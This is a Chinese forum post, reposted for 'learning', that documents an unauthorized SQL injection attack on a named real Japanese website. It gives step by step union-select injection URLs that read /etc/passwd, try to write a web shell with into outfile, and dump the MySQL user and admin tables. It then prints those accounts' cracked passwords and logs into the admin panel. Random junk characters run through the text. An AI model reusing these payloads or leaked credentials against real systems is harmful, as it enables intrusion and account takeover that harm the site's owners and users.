|
|
7 S' |/ k/ X. j* Y; Y; x) f7 g/ |# U3 [
0x01. 检测 www.zuaa.jp 收集数据
! \; b2 Q$ ?' ?; v
, s! _8 Y( o; `& j8 p; U2 e5 H2 O& S; S, Z$ p' V
whatweb
- h& x& ^% ?! K6 d$ c: B. m6 W2 T/ f; d( `) o* I
9 o% |3 b& q: O* H* F& T& p; _
利用NMAP扫描9 T# G9 ]5 Q1 q; d
# t6 A7 b( Q! Q; b
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
* j9 d5 S' y+ g0x02.找注入点
* S, {0 J# U6 W" c0 N$ ]找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3905 m/ B. v+ v8 u' A
8 @; q e* ]3 t* M) W u) `8 U, [8 d$ S- R& h0 n2 B2 a
0x03.order by ^* G! w I7 R% Z' R6 N& h
http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1+ K' W8 m+ d4 g* _. N3 O* d/ o+ b
8 e4 k7 M1 I+ X: t& g F# Lorder by 28报错,order by 27正常. i/ _8 X, J6 r
- p' _& V7 e v$ s- \
0x04. union手动查询5 ^1 l& N4 h' F5 A, }+ I3 H3 P/ l
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 . H- u5 F, S! K8 ^
添加到 27 时正常显示
J- F* O' V1 r. r) }4 \' y& b+ G3 U& g
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
: r8 r8 f7 `5 B5 e% e
5 l! h2 A' s+ C+ y' c8 {3 O0x05. info:
( O& R/ u3 Y& Ihttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 / M2 G. S, B( a8 y4 x* ^- w3 ^- F8 {# l
& S$ k. @1 t+ f5 f* Z' X R; xuser: root@localhost/ O( n& C7 Z5 q5 z
database: openpne1 T1 p4 p6 x+ P: k# y, b" d
version: 4.1.22
- S7 k/ i7 ]! U( zos: portbld-freebsd5.4* w8 |& r+ H* Z/ V% y( t
* d5 E' L7 U5 b d0x06. root用户
; e% N0 Y S8 P; A; g" o利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)' @+ n' A( n( E( B+ C
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
0 b# n# @% J7 V5 V0 z6 c# Z3 o! X8 ]& o2 V4 Z
通过工具转换5 l+ O: n0 F6 w" Y5 E% E# u: R
$ i) c' A3 \* W4 q* o( h( z( f中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持) |: r9 y8 W4 N$ F. b# H+ v
; N$ z% y. m! C( L C; n
0x07. 利用 into outfile9 _/ J/ c1 K6 `7 \0 \
全部都失败4 B( v( h3 n9 \
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php n7 p ? w" _* A
9 U$ o: W5 H# `; D$ e5 w/ }
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
; u5 x5 b u. l+ q% U2 H! i& h- N- X' S) z+ Z/ J) w2 B2 a
页面显示“MDB2 Error:syntax error”
8 R2 ]/ E' c& I& [7 A& g6 Y, ~: h. B4 E8 u
0x08. 利用 mysql 4.18 k3 H( W) {* N" ]
猜常规表名,字段未果 工具 sqlmap0 v- l# P4 u% B" s; {$ J4 h* N m- F
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
6 R! G% @% A: k4 A% z0 h( c) C& [) h! N. ]" J' _. g2 H' {
( P- a1 Z+ P% a8 z/ {- S) `; A; e, M5 v, `" d. L
0x09. 查找后台
+ ~4 p/ o) |% m2 V+ Z; n利用 现有的各种 后台工具尝试都不行
, e* s# j! l2 j5 Y# Q5 n" S9 I# T8 V2 A
0x10. MySL外联方法2 b: o/ Z% T4 u
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
' r1 G8 Y! j2 x可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user* n7 f* o% O: v3 n; x
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user% N7 E) l- F* G/ G. p! Q8 B
$ d! u) g. o- ~0 n
这个可以在 www.cmd5.com 解密/ W' N1 k; q+ J, z( M# }+ ^; `
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
' c5 u# L% L; N7 S9 mchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad977 G( v4 j/ Y3 a2 b; U D2 M# E
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
( K; F) J/ i) D) M) g6 |zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
' N( q$ _( o2 p G工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知- g" T6 g/ X4 e6 X% E9 k% x. k
- ^' e5 F6 q) O B1 m! c& ~5 y3 M9 x8 l6 x+ y! S
0x11. 网站突破
8 ^) E/ f5 _- Y6 O9 s! q, v发现网站的源程序 openpne, google 下载 openpne 源码 a/ x4 N. S% |( T
' G0 q3 ~" b0 T' D
: p& i4 q# E* i& ^0x12. 默认信息利用
3 _' Z5 C* @) I$ ?# I: ^http://sns.zuaa.jp/?m=admin&a=page_login8 z9 \( S% n. p. H6 _
& x& D# N6 b. A
表名 (c_admin_user) ,字段名(username,password)
- r2 o2 G4 b9 O* Q! thttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
* i7 G; |0 \, V/ _9 ?- u) W# c0 N- b6 k! p/ m% k
解密; l4 t5 J- r" b2 p! @3 O( d. c1 Q
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
( g! P8 I3 L6 t* v& {zuaajp:c0923ec5857796a393da99905008c176, zju18973 W* ?& }; K' f$ T# b
1 E; S# K. f8 m! z, h7 o中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
9 ]! Y' A# I. z% e# n7 V. i
9 f% N! O) y- S& a/ _0x13. 登录后台* O: O0 H x4 N' _
; u3 c7 D' d, L) Z) ^8 U7 @" N+ _
$ l, V4 D; H: N+ L" L5 A7 Z) t) X* Z0x14. 小结* V! d$ J& ^9 p6 r+ D* {, W6 l- B
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
; Q0 [" l. ?+ C6 u; Z感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
3 M* L% r$ j6 _: ]3 y7 ~" v5 ]/ A------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain2 S) f* {8 Q; n$ Z/ K. l
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持, `! h+ m; R: J h' E
& } E) ^2 w, h) G
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
( s; Q! p& l' K |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|